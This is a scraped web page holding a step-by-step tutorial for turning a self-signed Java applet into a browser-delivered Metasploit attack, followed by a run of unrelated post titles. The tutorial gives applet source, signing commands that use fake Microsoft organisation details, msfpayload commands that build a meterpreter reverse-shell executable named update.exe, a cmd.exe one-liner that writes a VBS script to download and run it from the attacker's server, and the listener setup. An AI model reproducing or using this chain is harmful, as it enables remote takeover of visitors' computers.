method and code to bind java applet with a payload import - TopicsExpress

method and code to bind java applet with a payload import java.applet.*; import java.awt.*; import java.io.*; public class MSFcmd extends Applet { public void init() { Process f; String cmd = "cmd.exe"; try { f = Runtime.getRuntime().exec(cmd); } catch(IOException e) { e.printStackTrace(); } Process s; } } Next, we need to self-sign the applet so that it can be run with access within the browser. Compile the Applet source code to an executable class. javac MSFcmd.java Package the compiled class into a JAR file. jar cvf MSFcmd.jar MSFcmd.class Generate key pairs. keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass Sign the JAR file. jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet Export the public key certificate. keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer To make this easier for people to use,I built a simple bash script called makeapplet.sh. Example of running makeapplet.sh: ./makeapplet.sh Enter the name of the applet without the extension: MSFcmd [+] Packaging the compiled class into a JAR file [+] Generating key pairs What is your first and last name? [Unknown]: What is the name of your organizational unit? [Unknown]: Microsoft What is the name of your organization? [Unknown]: Microsoft Organization What is the name of your City or Locality? [Unknown]: Redmond What is the name of your State or Province? [Unknown]: Seatle What is the two-letter country code for this unit? [Unknown]: US Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct? [no]: yes [+] Signing the JAR file Warning: The signer certificate will expire within six months. [+] Exporting the public key certificate Certificate stored in file [+] Done Finally, we just need to deploy the JAR and the class file. cp SignedMSFcmd.jar /var/www/ cp MSFcmd.class /var/www/ echo “” > /var/www/index.html sudo /etc/init.d/apache2 start Browse to the webserver from a windows system, which will execute cmd.exe To have the applet provide us a meterpreter reverse shell we need to modify the command that is run. First we need to construct a malicious executable using Metasploit: The executable can be constructed by: (replace x.x.x.x with the ip of your server) cd /pentest/exploits/framework3 ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -t exe -o update.exe; cp update.exe /var/www/ sudo chmod 755 /var/www/update.exe Now, we need to add a command into the Java Applet to download and execute the executable: cmd.exe /c echo Const adTypeBinary = 1 > C:windowsapsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:windowsapsou.vbs & echo Dim BinaryStream >> C:windowsapsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:windowsapsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:windowsapsou.vbs & echo BinaryStream.Open >> C:windowsapsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:windowsapsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:windowsapsou.vbs & echo Function BinaryGetURL(URL) >> C:windowsapsou.vbs & echo Dim Http >> C:windowsapsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:windowsapsou.vbs & echo Http.Open "GET", URL, False >> C:windowsapsou.vbs & echo Http.Send >> C:windowsapsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:windowsapsou.vbs & echo End Function >> C:windowsapsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:windowsapsou.vbs & echo shell.Run "C:windowsupdate.exe" >> C:windowsapsou.vbs & start C:windowsapsou.vbsx.x.x.x/my.exe C:windowsupdate.exe (replace x.x.x.x with the ip of your server) Reference: milw0rm/papers/262 Setup Metasploit to listen for the connections: sudo ./msfconsole use exploit/multi/handler set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x set LPORT 443 save exploit -j … [*] Exploit running as background job. [*] Started reverse handler [*] Starting the payload handler…

Paper Talks - International Football News - Daily Mail Liverpool

KAROMAH SYAIKH AL-ALBANI BAGIAN SATU; “MAMPU MENDHA’IFKAN

Cac ban da tjm hjeu kj ve luat khj tham gjafacebook trua? Toi vua

MEDICAL TARABA State House of Assembly has set up a

Day of discovery for both Loki and I. He loves to be brushed...he

"Un sujeto de consumo-indignado", Diego Litvinoof, Página 12,

When a Non IT Girl Marries an IT Professional He: (Returning late

Black Friday and Cyber Monday Sale Popular Bath Zambia Soap Dish

Marketing Manager ( Mandalay ) M(1) -Any grad,5 yrs Marketing

House University Radio Mix Sessions Episode #1 is now available

How to have more energy!!!??????? And we’re going to give you

Are the results of positive Kamma good from a Buddhists

kgeo fastloansamore.tripod/1/loan-consolidation-us.html rxsghz

Been a somewhat busy day so far today. Cleaning and packing some

Not good news from the latest edition of the WWF Living Planet

JESUS WEPT..WHY.. Some said..see how he LOVED him, others

HAPPY HALLOWEEN! Today I will be at Alexander Salazar-Fineart

Notes from the road. Gord. So here we are, after almost twenty

Daily Horoscopes are posted for Saturday, August 30, 2014 with the

I have been so anxious and moody the last week or so and couldnt

WORD FOR TODAY Doing Good Jesus is our example of living a

Value Wisdom Happy are those who find wisdom and those who gain

I HAD SOMETHING ON MY MIND THAT I HAD TO SHARE OR ELSE I WOULD NOT

How we awake people can spot or detect Sheeple People. I

Catholic Readings of the Day Advent Weekday 2 Samuel 7:1-5,

De repende me quedè dormido, soñé que estaba en Madrid luego

bon jai été prendre ma marche wow sais dure aujourhuit jai été

Croci, pupazzetti, fiori, arredi. I predatori del Verano, da

De tanto q muestran historia en la tv ..hasta mi papa se animo a